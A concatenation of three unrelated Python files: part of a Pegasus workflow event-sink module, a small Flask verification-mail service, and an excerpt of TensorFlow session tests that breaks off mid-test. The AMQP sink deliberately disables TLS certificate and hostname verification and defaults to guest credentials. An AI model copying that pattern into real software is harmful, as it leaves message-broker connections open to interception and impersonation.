def send(self, event, kw):
self._log.trace("send.start event=%s", event)
self._output.write(self._encoder(event=event, **kw))
if self._encoder == json_encode:
self._output.write("\n")
self._log.trace("send.end event=%s", event)
def close(self):
self._log.trace("close.start")
self._output.close()
self._log.trace("close.end")
class TCPEventSink(EventSink):
"""
Write wflow event logs to a host:port.
"""
def __init__(self, host, port, encoder=None, **kw):
super().__init__()
self._encoder = encoder
self._sock = socket.socket()
self._sock.connect((host, port))
def send(self, event, kw):
self._log.trace("send.start event=%s", event)
self._sock.send(self._encoder(event=event, **kw))
self._log.trace("send.end event=%s", event)
def close(self):
self._log.trace("close.start")
self._sock.close()
self._log.trace("close.end")
class AMQPEventSink(EventSink):
"""
Write wflow event logs to an AMQP server.
"""
EXCH_OPTS = {"exchange_type": "topic", "durable": True, "auto_delete": False}
DEFAULT_AMQP_VIRTUAL_HOST = "pegasus" # should be /
def __init__(
self,
host,
port,
exch=None,
encoder=None,
userid="guest",
password="guest",
virtual_host=DEFAULT_AMQP_VIRTUAL_HOST,
ssl_enabled=False,
props=None,
connect_timeout=None,
**kw
):
super().__init__()
self._log.info("Encoder used {} Properties received {}".format(encoder, props))
self._encoder = encoder
self._handled_events = set()
self._handle_all_events = False
self.configure_filters(props.property("events"))
self._msg_queue = queue.Queue()
self._stopping = False
self._exch = exch
if connect_timeout is None:
# pick timeout from properties
connect_timeout = props.property("timeout")
if connect_timeout:
connect_timeout = float(connect_timeout)
# insecure ssl
SSLOptions = None
if ssl_enabled:
context = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
SSLOptions = amqp.SSLOptions(context)
creds = amqp.PlainCredentials(userid, password)
self._params = amqp.ConnectionParameters(
host=host,
port=port,
ssl_options=SSLOptions,
virtual_host=virtual_host,
credentials=creds,
blocked_connection_timeout=connect_timeout,
heartbeat=None,
) # None -> negotiate heartbeat with the AMQP server
# initialize worker thread in daemon and start it
self._worker_thread = Thread(target=self.event_publisher, daemon=True)
self._worker_thread.start()
def event_publisher(self):
full_event, event, data = (None, None, None)
reconnect_attempts = 0
while not self._stopping:
try:
self._log.info(
"Connecting to host: %s:%s virtual host: %s exchange: %s with user: %s ssl: %s"
% (
self._params.host,
self._params.port,
self._params.virtual_host,
self._exch,
self._params.credentials.username,
not self._params.ssl_options is None,
)
)
self._conn = amqp.BlockingConnection(self._params)
self._channel = self._conn.channel()
self._channel.exchange_declare(self._exch, **self.EXCH_OPTS)
reconnect_attempts = 0
while not self._stopping:
try:
# if variables are initialized we haven't sent them yet.
# don't retrieve a new event, send the old one
if (full_event is None) and (event is None) and (data is None):
full_event, event, data = self._msg_queue.get(timeout=5)
self._log.trace("send.start event=%s", full_event)
self._channel.basic_publish(
body=data, exchange=self._exch, routing_key=full_event
)
self._log.trace("send.end event=%s", event)
# reset vars
full_event, event, data = (None, None, None)
# mark item as processed
self._msg_queue.task_done()
except queue.Empty:
self._conn.process_data_events() # keep up with the AMQP heartbeats
continue
# Do not recover if connection was closed by broker
except amqp.exceptions.ConnectionClosedByBroker as err:
self._log.error(
"Connection to %s:%s was closed by Broker - Not Recovering"
% (self._params.host, self._params.port)
)
self._log.error("Broker closed connection with: %s, stopping..." % err)
self._conn = None
break
# Do not recover on channel errors
except amqp.exceptions.AMQPChannelError as err:
self._log.error(
"Channel error at %s:%s - Not Recovering"
% (self._params.host, self._params.port)
)
self._log.error("Channel error: %s, stopping..." % err)
self._conn = None
break
# Recover on all other connection errors if reconnect attempts is less than 5
except amqp.exceptions.AMQPConnectionError:
reconnect_attempts += 1
if reconnect_attempts > 5:
self._log.info(
"Connection to %s:%s was closed - Not Recovering"
% (self._params.host, self._params.port)
)
break
else:
self._log.info(
"Connection to %s:%s was closed - Will try to recover the connection"
% (self._params.host, self._params.port)
)
time.sleep((2 ** reconnect_attempts) * 10)
continue
if not self._conn is None:
self._log.trace("connection - close.start")
self._conn.close()
self._log.trace("connection - close.end")
def configure_filters(self, events):
event_regexes = set()
if events is None:
# add pre-configured specific events
event_regexes.add(re.compile(STAMPEDE_NS + "job_inst.tag"))
event_regexes.add(re.compile(STAMPEDE_NS + "job_inst.composite"))
event_regexes.add(re.compile(STAMPEDE_NS + "inv.end"))
event_regexes.add(re.compile(STAMPEDE_NS + "wf.plan"))
else:
for exp in events.split(","):
if exp == "*":
# short circuit
self._handle_all_events = True
self._log.debug("Events Handled: All")
return
else:
event_regexes.add(re.compile(exp))
# go through each regex and match against accepted events once
for regex in event_regexes:
# go through each list of accepted events to check match
for event in self._acceptedEvents:
if regex.search(event) is not None:
self._handled_events.add(event)
self._log.debug("Events Handled: %s", self._handled_events)
def send(self, event, kw):
if not self._worker_thread.is_alive():
raise Exception("AMQP publisher thread is dead. Cannot send amqp events.")
full_event = STAMPEDE_NS + event
if self.ignore(full_event):
return
data = self._encoder(event=event, **kw)
self._msg_queue.put((full_event, event, data))
def ignore(self, event):
if self._handle_all_events:
# we want all events
return False
return event not in self._handled_events
def close(self):
if self._worker_thread.is_alive():
self._log.trace("Waiting for queue to emtpy.")
self._msg_queue.join() # wait for queue to empty if worker is alive
self._stopping = True
self._log.trace("Waiting for publisher thread to exit.")
self._worker_thread.join()
self._log.trace("Publisher thread exited.")
class MultiplexEventSink(EventSink):
"""
Sends events to multiple end points
"""
def __init__(self, dest, enc, prefix=STAMPEDE_NS, props=None, **kw):
super().__init__()
self._endpoints = {}
self._log.info("Multiplexed Event Sink Connection Properties %s", props)
for key in props.keyset():
if key.endswith(".url"):
sink_name = key[0 : key.rfind(".url")]
# remove from our copy sink_name properties if they exist
endpoint_props = properties.Properties(
props.propertyset(sink_name + ".", remove=True)
)
try:
self._endpoints[sink_name] = create_wf_event_sink(
props.property(key),
db_type=connection.DBType.WORKFLOW,
enc=enc,
prefix=prefix,
props=endpoint_props,
multiplexed=True,
**kw,
)
except Exception:
self._log.error(
"[multiplex event sender] Unable to connect to endpoint %s with props %s . Disabling"
% (sink_name, endpoint_props)
)
self._log.error(traceback.format_exc())
def send(self, event, kw):
remove_endpoints = []
for key in self._endpoints:
sink = self._endpoints[key]
try:
sink.send(event, kw)
except Exception:
self._log.error(traceback.format_exc())
self._log.error(
"[multiplex event sender] error sending event. Disabling endpoint %s"
% key
)
self.close_sink(sink)
remove_endpoints.append(key)
# remove endpoints that are disabled
for key in remove_endpoints:
del self._endpoints[key]
def close(self):
for key in self._endpoints:
self._log.debug("[multiplex event sender] Closing endpoint %s" % key)
self.close_sink(self._endpoints[key])
def close_sink(self, sink):
try:
sink.close()
except Exception:
pass
def flush(self):
"Clients call this to flush events to the sink"
for key in self._endpoints:
self._log.debug("[multiplex event sender] Flushing endpoint %s" % key)
self._endpoints[key].flush()
def bson_encode(event, **kw):
"""
Adapt bson.dumps() to NetLogger's Log.write() signature.
"""
kw["event"] = STAMPEDE_NS + event
return bson.dumps(kw)
def json_encode(event, **kw):
"""
Adapt bson.dumps() to NetLogger's Log.write() signature.
"""
kw["event"] = STAMPEDE_NS + event
# PM-1355 , PM-1365 replace all __ and . with _
for k, v in list(kw.items()):
new_key = k.replace(".", "_")
new_key = new_key.replace("__", "_")
kw[new_key] = kw.pop(k)
return json.dumps(kw)
def create_wf_event_sink(
dest, db_type, enc=None, prefix=STAMPEDE_NS, props=None, multiplexed=False, **kw
):
"""
Create & return subclass of EventSink, chosen by value of 'dest'
and parameterized by values (if any) in 'kw'.
"""
if dest is None:
return None
# we only subset the properties and strip off prefix once
if not multiplexed:
sink_props = get_workflow_connect_props(props, db_type)
# we delete from our copy pegasus.catalog.workflow.url as we want with default prefix
if "url" in sink_props.keyset():
del sink_props["url"]
sink_props.property("default.url", dest)
else:
sink_props = props
# PM-898 are additional URL's to populate specified
if not multiplexed and multiplex(dest, prefix, props):
sink_props.property("default.url", dest)
# any properties that don't have a . , remap to default.propname
for key in sink_props.keyset():
if key.find(".") == -1:
sink_props.property("default." + key, sink_props.property(key))
del sink_props[key]
return MultiplexEventSink(dest, enc, prefix, sink_props, **kw)
url = OutputURL(dest)
log.info("Connecting workflow event sink to %s" % dest)
# Pick an encoder
def pick_encfn(enc_name, namespace):
if enc_name is None or enc_name == "bp":
# NetLogger name=value encoding
encfn = nlapi.Log(level=nlapi.Level.ALL, prefix=namespace)
elif enc_name == "bson":
# BSON
if bson is None:
raise Exception(
"BSON encoding selected, but cannot import bson library"
)
encfn = bson_encode
elif enc_name == "json":
encfn = json_encode
else:
raise ValueError("Unknown encoding '%s'" % (enc_name))
return encfn
# Branch on scheme
if url.scheme == "":
sink = FileEventSink(dest, encoder=pick_encfn(enc, prefix), **kw)
_type, _name = "file", dest
elif url.scheme == "file":
sink = FileEventSink(url.path, encoder=pick_encfn(enc, prefix), **kw)
_type, _name = "file", url.path
elif url.scheme == "x-tcp":
if url.port is None:
url.port = 14380
sink = TCPEventSink(url.host, url.port, encoder=pick_encfn(enc, prefix), **kw)
_type, _name = "network", "{}:{}".format(url.host, url.port)
elif url.scheme in ["amqp", "amqps"]:
# amqp://[USERNAME:PASSWORD@]<hostname>[:port]/[<virtualhost>]/<exchange_name>
if amqp is None:
raise Exception("AMQP destination selected, but cannot import AMQP library")
if url.port is None:
if url.scheme == "amqps":
url.port = 5671 # RabbitMQ default TLS
else:
url.port = 5672 # RabbitMQ default
# PM-1258 parse exchange and virtual host info
exchange = None
virtual_host = None
path_comp = url.path.split("/")
if path_comp is not None:
exchange = path_comp.pop()
if path_comp is not None:
virtual_host = path_comp.pop()
if len(virtual_host) == 0:
virtual_host = None
# PM-1355 set encoder to json always for AMQP endpoints
enc = "json"
sink = AMQPEventSink(
url.host,
url.port,
virtual_host=virtual_host,
exch=exchange,
userid=url.user,
password=url.password,
ssl_enabled=(url.scheme == "amqps"),
encoder=pick_encfn(enc, prefix),
props=sink_props,
**kw,
)
_type, _name = "AMQP", "{}:{}/{}".format(url.host, url.port, url.path)
else:
# load the appropriate DBEvent on basis of prefix passed
sink = DBEventSink(dest, namespace=prefix, props=sink_props, **kw)
_type, _name = "DB", dest
log.info("output type={} namespace={} name={}".format(_type, prefix, _name))
return sink
def multiplex(dest, prefix, props=None):
"""
Determines whether we need to multiplex and events to multiple sinks
:param dest:
:param props:
:return:
"""
if props is None:
return False
# we never attempt multiplex on dashboard sink
if prefix == DASHBOARD_NS:
return False
additional_sink_props = props.propertyset("pegasus.catalog.workflow" + ".", False)
multiplex = False
for key in additional_sink_props:
if key == "pegasus.catalog.workflow.url":
pass
if key.endswith(".url"):
multiplex = True
break
return multiplex
def get_workflow_connect_props(props, db_type):
"""
Returns connection properties for workflow database
:param props:
:return:
"""
if props is None:
return None
# first get the default one's with the star notation
connect_props = properties.Properties(props.propertyset("pegasus.catalog.*.", True))
prefix = "pegasus.catalog.workflow"
if db_type == connection.DBType.MASTER:
prefix = "pegasus.catalog.dashboard"
# over ride these with workflow specific or dashboard specific props
addons = props.propertyset(prefix + ".", True)
for key in addons:
connect_props.property(key, addons[key])
return connect_props
|
mailService.py
|
# Remote Services Calls
from threading import Thread
import jwt
from flask import url_for
from flask_mail import Message
from . import app
from . import mail
def send_async(app, msg):
with app.app_context():
mail.send(msg)
def send_verification_mail(recipient, token):
link = url_for('verify_email', token=token, _external=True)
print("USER EMAIL CONFIRMATION LINK: ", link)
msg = Message('Zelite Account Verification', sender="omarosmandev@gmail.com",
recipients=[recipient])
msg.body = 'Click the link below to activate your account ' + link
msg.html = "<h2>Zelite Platform</h2><P>Welcome To Zelite IoT Platform Click activate to verify your account</p> \
<a href={} >activate</a>".format(link)
# mail.send(msg)
Thread(target=send_async, args=(app, msg)).start()
def send_password_reset_mail():
pass
|
session_test.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import constant_op
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.util import compat
# NOTE(mrry): Dummy shape registration for op used in the tests.
ops.RegisterShape('ConstructionFails')(None)
class SessionTest(test_util.TensorFlowTestCase):
def testUseExistingGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session(graph=g):
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testUseDefaultGraph(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session():
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testCreate(self):
with session.Session():
inp = constant_op.constant(10.0, name='W1')
copy = array_ops.identity(inp)
# Test with feed.
# TODO(mrry): Investigate why order='F' didn't work.
arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
copy_val = copy.eval({'W1:0': arr})
self.assertAllEqual(arr, copy_val)
# Test without feed.
copy_val = copy.eval()
self.assertAllEqual(np.asarray(10.0, dtype=np.float32), copy_val)
def testManyCPUs(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(device_count={'CPU': 2})):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testPerSessionThreads(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(use_per_session_threads=True)):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testErrorsReported(self):
with session.Session() as s:
constant_op.constant(10.0, name='W1')
with self.assertRaises(ValueError):
s.run('foo:0')
def testErrorPayload(self):
with session.Session():
a = array_ops.placeholder(dtypes.float32)
with self.assertRaisesOpError(lambda e: e.op == a.op):
a.eval()
def testErrorCodeWithNoNodeDef(self):
with session.Session() as s:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
def exc_predicate(e):
return (e.op is None and e.node_def is None and
e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
# Run with a bogus handle.
s.partial_run('foo', r1, feed_dict={a: 1, b: 2})
def testOpConstructionErrorPayload(self):
with session.Session():
failing_op = ops.get_default_graph().create_op(
'ConstructionFails', [], [], name='f')
def exc_predicate(e):
return (e.op == failing_op
and e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
failing_op.run()
def testErrorBasedOn(self):
with session.Session() as sess:
a = constant_op.constant(0.0, shape=[2, 3])
# NOTE(mrry): The original_op is nonsense, but used here to test that the
# errors are reported correctly.
# pylint: disable=protected-access
with sess.graph._original_op(a.op):
b = array_ops.identity(a, name='id')
with sess.graph._original_op(b.op):
c = array_ops.placeholder(dtypes.float32)
# pylint: enable=protected-access
def exc_predicate(e):
return (e.op == c.op
and e.op._original_op == b.op
and e.op._original_op._original_op == a.op)
with self.assertRaisesOpError(exc_predicate):
c.eval()
def testFetchTensorObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
results_with_list = s.run([c])
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
results_with_single = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
results_with_get = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
a_val, b_val = s.run([a, b]) # Test multiple fetches.
self.assertAllEqual([[1.0, 1.0]], a_val)
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
def testFetchScalar(self):
with session.Session() as s:
for scalar in np.int32, np.int64, np.float32, np.float64:
x = scalar(7)
y = scalar(8)
tf_x = constant_op.constant(x, shape=[])
tf_y = constant_op.constant(y)
tf_xy = math_ops.add(tf_x, tf_y)
# Single fetch
xy = s.run(tf_xy)
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# List fetch
xy, = s.run([tf_xy])
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
def testFetchOperationObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
v = variables.Variable(a, name='testFetchOperationObject_v')
s.run(v.initializer)
v_val = s.run(v)
self.assertAllEqual([[1.0, 1.0]], v_val)
def testFetchSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
constant_op.constant(indices),
constant_op.constant(values),
constant_op.constant(shape))
# Single fetch, use as tuple
sp_out = s.run(sp)
indices_out, values_out, shape_out = sp_out
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Single fetch, use as SparseTensorValue
sp_out = s.run(sp)
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
# Tuple fetch, use as tuple
indices_out, values_out, shape_out = s.run(sp)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as tuple
(indices_out, values_out, shape_out), = s.run([sp])
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as SparseTensorValue
sp_out, = s.run([sp])
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
def testFeedSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.shape)
sp2 = ops.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape],
{sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.shape, shape)
def testFetchIndexedSlices(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices),
constant_op.constant(dense_shape))
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlices(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
array_ops.placeholder(dtype=np.int64,
shape=(3,)),)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind_dense_shape = array_ops.identity(ind.dense_shape)
ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape)
# Feed with tuple
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: (values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testFetchIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = None
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices), None)
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = None
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
None)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind2 = ops.IndexedSlices(ind_values, ind_indices)
# Feed with tuple
values_out, indices_out = s.run(
[ind_values, ind_indices], {ind: (values, indices)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue
values_out, indices_out = s.run(
[ind_values, ind_indices],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testExtendWithStatelessOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
# Extend will happen here.
e_val = s.run(e)
self.assertAllEqual([[24.0]], e_val)
def testExtendWithStatefulOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
# Extend will happen here.
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
def testExtendWithGroupBy(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
p = variables.Variable(a, name='testExtendWithGroupBy_p')
a_val = a.eval() # Force an Extend after this op.
self.assertAllEqual([[1.0, 1.0]], a_val)
b = constant_op.constant(2.0, shape=[1, 2])
q = variables.Variable(b, name='testExtendWithGroupBy_q')
# Extend will happen here.
init = control_flow_ops.group(p.initializer, q.initializer)
s.run(init)
p_val, q_val = s.run([p, q])
self.assertAllEqual([[1.0, 1.0]], p_val)
self.assertAllEqual([[2.0, 2.0]], q_val)
def testTensorGetMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
def testOperationRunMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 2], name='b')
v = variables.Variable(a, a.dtype)
assign_a_to_v = state_ops.assign(v, a)
assign_a_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[1.0, 1.0]], v_val)
assign_b_to_v = state_ops.assign(v, b)
assign_b_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[2.0, 2.0]], v_val)
assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
v_val = v.eval()
self.assertAllEqual([[3.0, 3.0]], v_val)
def testDefaultGraph(self):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
self.assertEqual(ops.get_default_graph(), a.graph)
self.assertEqual(ops.get_default_graph(), b.graph)
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testDefaultGraph_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='var_%d' % i)
# Block here until all threads have constructed their graph.
constructed_event.set()
continue_event.wait()
assign_c_to_v = state_ops.assign(v, c)
v.initializer.run()
assign_c_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
